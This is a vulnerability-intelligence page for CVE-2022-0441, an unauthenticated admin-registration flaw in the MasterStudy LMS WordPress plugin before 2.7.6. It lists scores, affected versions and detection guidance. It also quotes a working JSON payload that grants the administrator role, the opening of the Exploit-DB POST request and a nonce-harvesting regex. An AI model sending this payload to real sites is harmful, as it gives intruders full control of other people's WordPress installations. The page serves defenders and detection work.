CVE-2022-0441
published 2022-03-07CVE-2022-0441: The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to…
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.33%
99.7th percentile
The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| stylemixthemes | masterstudy_lms | < 2.7.6 | 2.7.6 |
Detection & IOCsextracted from sources · hover to see the quote
command{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}↗
yara↗
regex: '"stm_lms_register":"([0-9a-z]+)"'
- →Look for POST requests to /wp-admin/admin-ajax.php with action=stm_lms_register containing a JSON body with 'profile_default_fields_for_register' key including 'wp_capabilities' set to administrator:1 — this is the privilege escalation payload. ↗
- →Detect the specific JSON key path 'profile_default_fields_for_register.wp_capabilities.value.administrator' with value 1 in POST body to admin-ajax.php as the indicator of exploitation attempt. ↗
- →A successful exploitation response contains both 'Registration completed successfully' and '"status":"success"' in the HTTP response body with Content-Type application/json. ↗
- →The nonce value required for the attack is extracted from the page source via the pattern '"stm_lms_register":"([0-9a-z]+)"' — monitor for reconnaissance GET requests followed immediately by the malicious POST. ↗
- →The attack is unauthenticated; no session cookie or prior login is required. Any POST to admin-ajax.php?action=stm_lms_register from an unauthenticated source should be treated as suspicious. ↗
- ·The nonce value in the exploit URL is dynamic and must be harvested from the target page before the attack POST; it is not a static IOC. ↗
- ·Vulnerability only affects MasterStudy LMS plugin versions strictly before 2.7.6; version 2.7.6 and above are patched. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ghw6-93qf-85hg: The MasterStudy LMS WordPress plugin before 2
ghsa_unreviewed·2022-03-08
CVE-2022-0441 [CRITICAL] CWE-269 GHSA-ghw6-93qf-85hg: The MasterStudy LMS WordPress plugin before 2
The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
VulnCheck
MasterStudy LMS WordPress New Account Authentication Bypass
vulncheck·2022·CVSS 9.8
CVE-2022-0441 [CRITICAL] MasterStudy LMS WordPress New Account Authentication Bypass
MasterStudy LMS WordPress New Account Authentication Bypass
The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
Affected: stylemixthemes masterstudy_lms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/vulnerability/masterstudy-lms-learning-management-system/wordpress-masterstudy-lms-plugin-2-7-5-unauthenticated-admin-account-creation-vulnerability
Exploit PoC: https://vulncheck.com/xdb/610484d97e27; https://vulncheck.com/xdb/5c3bd7ca7d81; https://vulncheck.com/xdb/024c6c3af9ba
No detection rules found.
Exploit-DB
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
exploitdb·2022-02-18·CVSS 9.8
CVE-2022-0441 [CRITICAL] WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
---
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0
Metasploit
Wordpress MasterStudy Admin Account Creation
metasploit
Wordpress MasterStudy Admin Account Creation
Wordpress MasterStudy Admin Account Creation
MasterStudy LMS, a WordPress plugin, prior to 2.7.6 is affected by a privilege escalation where an unauthenticated user is able to create an administrator account for wordpress itself.
Nuclei
MasterStudy LMS <2.7.6 - Improper Access Control
nuclei·CVSS 9.8
CVE-2022-0441 [CRITICAL] MasterStudy LMS <2.7.6 - Improper Access Control
MasterStudy LMS <2.7.6 - Improper Access Control
WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2022-0441
info:
name: MasterStudy LMS <2.7.6 - Improper Access Control
author: dwisiswant0,theamanrawat
severity: critical
description: |
WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able
2022-03-07
Published
Exploited in the wild